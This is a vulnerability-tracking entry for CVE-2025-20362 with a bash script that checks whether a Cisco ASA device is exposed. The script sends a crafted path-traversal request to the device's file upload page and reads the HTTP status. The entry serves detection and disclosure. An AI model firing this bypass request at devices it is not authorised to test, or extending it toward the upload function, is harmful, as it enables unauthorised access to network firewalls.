vulnerability:exploitability=industrialised vulnerability:information=PoC

Created on 2025-10-06 15:02 and updated on 2025-10-06 16:25.

Description

A script to check whether an ASA is vulnerable is available at the following link:

https://gist.cnw.circl.lu/alexandre.dulaunoy/95ca6ae6259e4c8b899b916ee8b3d4a6

#!/bin/bash

# CIRCL - 2025
# Test CVE 2025-20362
# Ref : https://attackerkb.com/topics/Szq5u0xgUX/cve-2025-20362/rapid7-analysis

if [ -z "$1" ]; then
  echo "Test for CVE-2025-20362"
  echo "Usage: $0 <IP>"
  exit 1
fi

IP="$1"

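echo "Looking for CVE-2025-20362"
# The temporary OpenSSL config (system config plus UnsafeLegacyRenegotiation)
# lets curl complete the TLS handshake with servers that lack secure
# renegotiation support. --path-as-is stops curl from normalising the /../
# sequence in the request path. stderr is captured so the -v status line
# can be inspected below.
response=$(OPENSSL_CONF=<(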
  echo -e 'openssl_conf = openssl_init\n\n[openssl_init]\nssl_conf = ssl_sect\n\n[ssl_sect]'
  echo -e 'system_default = system_default_sect\n\n[system_default_sect]\nOptions = UnsafeLegacyRenegotiation\n'
  cat /etc/ssl/openssl.cnf
) curl "https://$IP/+CSCOU+//../+CSCOE+/files/file_action.html?mode=upload&path=foo&server=srv&sourceurl=qaz" \
  -S --insecure -v -o - --path-as-is 2>&1)

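# A 404 means the request was rejected; a 200 means the page was served.
if echo "$response" | grep -q "HTTP/1.1 404"; then
  echo "Not vulnerable"
elif echo "$response" | grep -q "HTTP/1.1 200"; then
  echo "Vulnerable"
else
  # Connection failure or any other status: do not report a result.
  echo "Inconclusive: no HTTP/1.1 200 or 404 status in the response"
fi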


Associated vulnerability

CVE-2025-20362

Meta

[
  {
    "tags": [
      "vulnerability:exploitability=industrialised",
      "vulnerability:information=PoC"
    ]
  }
]

Author

Paul Jung